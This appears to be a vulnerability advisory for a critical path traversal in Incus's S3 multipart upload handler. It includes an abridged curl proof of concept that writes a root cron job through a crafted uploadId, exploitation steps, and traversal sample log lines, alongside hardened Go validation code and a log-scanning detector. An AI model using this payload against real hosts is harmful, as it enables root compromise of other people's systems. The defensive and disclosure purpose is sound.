How CVE-2026-XXXXX Works
The vulnerability resides in Incus's S3‑compatible storage endpoint, specifically in the multipart upload handler. When a client initiates a multipart upload, the server generates a unique upload ID and creates a directory under the uploads root using that ID. Later, when the client uploads a part, the `uploadPart` function retrieves the `uploadId` directly from the request query string and passes it to `s.uploadDir()`, which constructs the path as `filepath.Join(s.uploadsDir(), uploadID)`. No sanitization or validation is performed on the `uploadId` value before it is used in the filesystem path.
An attacker can supply a malicious `uploadId` containing path‑traversal sequences (e.g., `../../../../etc/cron.d`) to force the server to write the uploaded part outside the intended uploads directory. Because the part is written with a predictable name (`part-00001`), the attacker can place arbitrary content into arbitrary locations on the host filesystem. The server runs as root, so any file can be overwritten or created, including cron jobs, SSH keys, or system binaries. This ultimately leads to arbitrary command execution with root privileges.
The issue is rooted in the lack of input validation in the multipart upload flow: the upload ID is treated as a trusted path component, enabling directory traversal that bypasses all directory restrictions.
DailyCVE Form
| Field | Value |
|---|---|
| Platform | Incus (Linux Containers) |
| Version | prior to 6.23.0 |
| Vulnerability | Path Traversal (CWE‑22) |
| Severity | Critical (CVSS 9.6) |
| Date | 2026‑06‑26 |
| Prediction | Patch expected 2026‑07‑10 |
What Undercode Says (Analytics)
Enable S3 API and create a bucket:

```bash
incus config set core.storage_buckets_address=:8555
incus storage volume create default bucket
```
PoC script (abridged):

```bash
#!/usr/bin/env bash
endpoint="http://localhost:8555"
bucket="default"
access="<ACCESS_KEY>"
secret="<SECRET_KEY>"
upload_id="../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/cron.d"
# Construct the malicious S3 PUT request with AWS Signature V4
# The upload_id is injected into the query string; the server writes part-00001 to /etc/cron.d/
# host, amz_date, body_hash and auth come from the SigV4 signing step omitted in this abridged script
curl -X PUT "${endpoint}/${bucket}/anything?partNumber=1&uploadId=${upload_id//\//%2F}" \
  -H "Host: ${host}" \
  -H "X-Amz-Date: ${amz_date}" \
  -H "X-Amz-Content-Sha256: ${body_hash}" \
  -H "Authorization: ${auth}" \
  --data-binary " root /bin/sh -c 'id > /incus-s3-rce; rm -f /etc/cron.d/part-00001'"
```
Code Snippet (Vulnerable Line):

```go
// internal/server/storage/s3/local/multipart.go
func (s Server) uploadDir(uploadID string) string {
	return filepath.Join(s.uploadsDir(), uploadID) // No sanitization of uploadID
}
```
The `uploadID` is taken directly from the request and used to build the filesystem path, enabling directory traversal.
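The following is an added example, not code from Incus or from the original post. It places the flawed pattern beside a hardened version of `uploadDir`: `filepath.Join` cleans the path, but `..` elements survive cleaning and climb out of the root, which is exactly why the one-line function above is exploitable. The `uploadsRoot` directory and the allowed ID shape (`uploadIDPattern`) are assumptions made for the example; the page does not give the real values.

```go
package main

import (
	"errors"
	"fmt"
	"path/filepath"
	"regexp"
	"strings"
)

// uploadsRoot stands in for s.uploadsDir(); the directory is an assumption made for
// this example, not a path taken from Incus.
const uploadsRoot = "/var/lib/incus/storage-buckets/default/.uploads"

// vulnerableUploadDir reproduces the flawed pattern: filepath.Join cleans the result,
// but ".." elements are honoured during cleaning and walk out of uploadsRoot.
func vulnerableUploadDir(uploadID string) string {
	return filepath.Join(uploadsRoot, uploadID)
}

// ErrInvalidUploadID is returned for any ID that does not look server-issued.
var ErrInvalidUploadID = errors.New("invalid upload ID")

// uploadIDPattern is an allow-list for the opaque IDs the server hands out. The exact
// format Incus uses is not given on the page, so this shape is an assumption.
var uploadIDPattern = regexp.MustCompile(`^[A-Za-z0-9_-]{1,128}$`)

// safeUploadDir applies two independent checks: the ID must match the allow-list, and
// the joined path must still resolve to a direct child of uploadsRoot. The second check
// is redundant with the first by design (defence in depth against a loosened regex).
func safeUploadDir(uploadID string) (string, error) {
	if !uploadIDPattern.MatchString(uploadID) {
		return "", ErrInvalidUploadID
	}
	dir := filepath.Join(uploadsRoot, uploadID)
	rel, err := filepath.Rel(uploadsRoot, dir)
	if err != nil || rel == "." || rel == ".." ||
		strings.HasPrefix(rel, ".."+string(filepath.Separator)) {
		return "", ErrInvalidUploadID
	}
	return dir, nil
}

func main() {
	traversal := "../../../../../../../../etc/cron.d"
	fmt.Println("vulnerable:", vulnerableUploadDir(traversal)) // escapes the uploads root
	for _, id := range []string{"7c1d9e2f", traversal, "a/b", "..", "x%2Fy"} {
		dir, err := safeUploadDir(id)
		fmt.Printf("safe(%q): dir=%q err=%v\n", id, dir, err)
	}
}
```

The allow-list is the check that matters: a deny-list of `..` and `/` misses encodings the HTTP layer decodes later (the query parser already turns `%2F` into `/` before the handler runs, and a double-encoded `%252F` arrives as `%2F`, which the allow-list also rejects). Checking the resolved path against the root with `filepath.Rel` costs nothing and catches any future change that weakens the pattern.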
Exploit
- Prerequisite: The attacker must have valid S3 credentials (access key and secret) for the Incus bucket.
- Craft Request: Send a `PUT` request to the multipart upload endpoint with a `partNumber` and a malicious `uploadId` containing `../` sequences.
- Write Payload: The server writes the uploaded part (e.g., `part-00001`) to the traversed path (e.g., `/etc/cron.d/part-00001`).
- Trigger Execution: If the written file is a cron job, it will be executed by the system scheduler, granting the attacker root‑level command execution.
Protection
- Upgrade Incus to version 6.23.0 or later, which includes a fix for this vulnerability.
- Validate and sanitize all user‑supplied path components (e.g., `uploadId`) to reject `..`, `/`, and other dangerous sequences.
- Restrict S3 API access to trusted networks and users only; use firewall rules or network policies.
- Run the Incus daemon with the least privilege necessary (avoid running as root if possible).
- Monitor the filesystem for unexpected writes to sensitive directories (e.g., `/etc/cron.d`, `/root/.ssh`).
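Monitoring the filesystem catches a successful write; the request log catches the attempt, including attempts that fail. The following is an added example, not part of the original post or of Incus: it scans request-log lines for `uploadId` values that could not have been issued by the server. The log format (`<time> <method> <request-target> <status>`) and the sample lines are constructed for the example, and the accepted ID shape (`wellFormedID`) is an assumption, since the page does not state the real format.

```go
package main

import (
	"fmt"
	"net/url"
	"regexp"
	"strings"
)

// Finding records one request whose uploadId does not look server-issued.
type Finding struct {
	Line      int
	Method    string
	DecodedID string
	Reason    string
}

// wellFormedID is the shape assumed for a legitimate upload ID (opaque token, no
// separators); the real format is not given on the page.
var wellFormedID = regexp.MustCompile(`^[A-Za-z0-9_-]{1,128}$`)

// classifyUploadID returns "" for an acceptable ID (or no ID at all) and a short
// reason otherwise. The allow-list check at the end is what makes the function
// robust; the two explicit checks before it only give a more useful reason string.
func classifyUploadID(id string) string {
	switch {
	case id == "":
		return "" // not a part upload; nothing to check
	case strings.Contains(id, ".."):
		return "dot-dot segment"
	case strings.ContainsAny(id, `/\`):
		return "path separator"
	case !wellFormedID.MatchString(id):
		return "unexpected characters"
	}
	return ""
}

// scanRequestLog parses lines of the constructed form "<time> <method> <target> <status>"
// and flags every request whose decoded uploadId fails classifyUploadID.
func scanRequestLog(lines []string) []Finding {
	var findings []Finding
	for i, line := range lines {
		fields := strings.Fields(line)
		if len(fields) < 4 {
			continue // malformed line; skip rather than abort the scan
		}
		u, err := url.Parse(fields[2])
		if err != nil {
			continue
		}
		// Query() percent-decodes once, which is what the server's handler sees.
		id := u.Query().Get("uploadId")
		if reason := classifyUploadID(id); reason != "" {
			findings = append(findings, Finding{Line: i + 1, Method: fields[1], DecodedID: id, Reason: reason})
		}
	}
	return findings
}

// sampleLog is constructed for this example; the IDs and timestamps are not real.
var sampleLog = []string{
	"2026-06-26T10:00:00Z POST /default/obj?uploads 200",
	"2026-06-26T10:00:01Z PUT /default/obj?partNumber=1&uploadId=7c1d9e2f 200",
	"2026-06-26T10:00:02Z PUT /default/anything?partNumber=1&uploadId=..%2F..%2F..%2Fetc%2Fcron.d 200",
	"2026-06-26T10:00:03Z PUT /default/anything?partNumber=1&uploadId=..%252F..%252Fetc 200",
}

func main() {
	for _, f := range scanRequestLog(sampleLog) {
		fmt.Printf("line %d: %s uploadId=%q (%s)\n", f.Line, f.Method, f.DecodedID, f.Reason)
	}
}
```

The fourth sample line shows why the allow-list matters for detection as well as for the fix: a double-encoded value decodes to `..%2F..%2Fetc`, which no longer contains a literal `/`, yet it is still flagged. A `200` status on such a line, rather than a `400`, is the signal that the server accepted the value and the host needs the filesystem check above.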
Impact
- Arbitrary File Write: An attacker can write or overwrite any file on the host filesystem as root.
- Privilege Escalation: By writing to cron directories, SSH authorized_keys, or systemd service files, the attacker can gain persistent root access.
- Denial of Service: Overwriting critical system files or configuration can render the host unbootable or unstable.
- Full System Compromise: The ability to write arbitrary files ultimately leads to arbitrary command execution and complete control over the host system.
Sources:
Reported By: github.com